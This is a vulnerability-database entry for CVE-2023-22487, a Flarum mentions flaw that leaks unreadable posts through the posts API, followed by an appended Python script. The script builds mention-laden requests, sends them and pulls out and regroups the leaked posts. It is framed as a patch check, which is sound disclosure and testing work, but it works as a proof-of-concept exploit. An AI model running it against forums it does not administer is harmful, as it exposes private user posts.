Sami Mazouz

#34056 of 53,633
7.7 Total CVSS
Vulnerabilities · 1
PT-2023-18538
7.7
2023-01-10
Flarum · Flarum · CVE-2023-22487
**Name of the Vulnerable Software and Affected Versions**

Flarum versions prior to 1.6.3

**Description**

The issue concerns the mentions feature provided by the `flarum/mentions` extension, which lets users mention any post ID on the forum using a special syntax. The feature leaks the discussion ID and post number of a mentioned post regardless of whether the actor is allowed to read it. In addition, the `mentionsPosts` relationship in the `POST /api/posts` and `PATCH /api/posts/<id>` JSON:API responses returns the full payload of every mentioned post without any access control, including its content, date, number, and any attributes added by other extensions.

An attacker exploits this by creating new posts that mention the target post IDs. Because the leak is in the API response returned to the attacker, it works even when new posts require approval before they become visible to anyone else. If the attacker can edit posts, the same payload is returned by `PATCH /api/posts/<id>`, so the attack can be carried out more discreetly. Iterating over post IDs allows every post in the forum database to be leaked, including posts awaiting approval, posts in tags the user has no access to, and private discussions created by other extensions. The discussion payload itself is not returned, but each leaked post carries its discussion ID, so the leaked posts can be regrouped into their original discussions.

**Recommendations**

For Flarum versions prior to 1.6.3, update to version 1.6.3 by running `composer update --prefer-dist --no-dev -a -W` and confirm the update with `composer show flarum/core`. As a temporary workaround, disable the mentions extension until the update can be applied.
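The check a forum operator would want before and after the update, as an added example that is not Flarum's code or the advisory author's: it builds the mention-laden post body described above, then inspects the JSON:API response for mentioned posts echoed back in `included` (where the leaked payload appears, keyed by the `mentionsPosts` relationship) and regroups them by discussion ID. The `@"x"#p<id>` mention syntax, the `Authorization: Token` header scheme and both sample responses are assumptions and constructed data, not taken from the page; on an unpatched instance, a post the actor cannot read is expected to come back in `included`, and after 1.6.3 it should not.

```python
"""Check whether a Flarum POST /api/posts (or PATCH /api/posts/<id>) response
echoes mentioned posts the actor should not be able to read (CVE-2023-22487).
Added example, not Flarum's own code. Assumptions: post-mention syntax is
@"Display Name"#p<postId>, the API token goes in "Authorization: Token <t>",
and the sample responses below are constructed, not captured from a forum."""
import json
import urllib.request


def build_post_body(discussion_id, target_post_ids):
    """JSON:API body for a new post that mentions every target post ID."""
    # Assumed mention syntax; the display-name part is ignored server-side here.
    content = " ".join(f'@"x"#p{pid}' for pid in target_post_ids)
    return {
        "data": {
            "type": "posts",
            "attributes": {"content": content},
            "relationships": {
                "discussion": {"data": {"type": "discussions", "id": str(discussion_id)}}
            },
        }
    }


def leaked_posts(response, target_post_ids):
    """Return the targeted posts that the server returned in `included`.

    Each entry carries the fields the advisory lists as leaked: the post's
    number, its discussion ID and its rendered content."""
    targets = {str(pid) for pid in target_post_ids}
    rel = (response.get("data", {}).get("relationships", {})
           .get("mentionsPosts", {}).get("data") or [])
    listed = {r["id"] for r in rel if r.get("type") == "posts"}
    leaks = []
    for res in response.get("included") or []:
        if res.get("type") != "posts" or res.get("id") not in targets:
            continue
        attrs = res.get("attributes") or {}
        disc = (res.get("relationships") or {}).get("discussion", {}).get("data") or {}
        leaks.append({
            "id": res["id"],
            "number": attrs.get("number"),
            "discussion_id": disc.get("id"),
            "content": attrs.get("contentHtml"),
            "listed_in_mentionsPosts": res["id"] in listed,
        })
    return leaks


def group_by_discussion(leaks):
    """Reassemble leaked posts into their discussions, ordered by post number."""
    groups = {}
    for post in leaks:
        groups.setdefault(post["discussion_id"], []).append(post)
    for posts in groups.values():
        posts.sort(key=lambda p: p["number"] if p["number"] is not None else -1)
    return groups


def send(base_url, token, method, path, body):
    """Live request helper for a real instance (not exercised offline)."""
    req = urllib.request.Request(base_url.rstrip("/") + path,
                                 data=json.dumps(body).encode(), method=method)
    req.add_header("Content-Type", "application/vnd.api+json")
    req.add_header("Authorization", f"Token {token}")  # assumed header scheme
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


# Constructed sample: the attacker posts in discussion 5 and mentions post 42,
# which lives in discussion 7 that the actor cannot read. Post 43 does not exist.
VULNERABLE_RESPONSE = {
    "data": {"type": "posts", "id": "900",
             "attributes": {"number": 2, "contentHtml": "<p>hi</p>"},
             "relationships": {
                 "discussion": {"data": {"type": "discussions", "id": "5"}},
                 "mentionsPosts": {"data": [{"type": "posts", "id": "42"}]}}},
    "included": [
        {"type": "posts", "id": "42",
         "attributes": {"number": 3, "createdAt": "2022-12-01T10:00:00+00:00",
                        "contentHtml": "<p>private text</p>"},
         "relationships": {"discussion": {"data": {"type": "discussions", "id": "7"}}}}
    ],
}

# Constructed sample of the post-fix shape: the unreadable post is not returned.
FIXED_RESPONSE = {
    "data": {"type": "posts", "id": "900",
             "attributes": {"number": 2, "contentHtml": "<p>hi</p>"},
             "relationships": {
                 "discussion": {"data": {"type": "discussions", "id": "5"}},
                 "mentionsPosts": {"data": []}}},
    "included": [],
}

if __name__ == "__main__":
    body = build_post_body(5, [42, 43])
    print("request content:", body["data"]["attributes"]["content"])
    for label, resp in (("vulnerable", VULNERABLE_RESPONSE), ("fixed", FIXED_RESPONSE)):
        leaks = leaked_posts(resp, [42, 43])
        print(label, "leaked:", len(leaks), group_by_discussion(leaks))
```

To run it against a real instance, replace the constructed responses with `send(base_url, token, "POST", "/api/posts", build_post_body(...))` using a low-privilege test account; any entry reported by `leaked_posts` for a post that account cannot open in the UI confirms the instance is still affected.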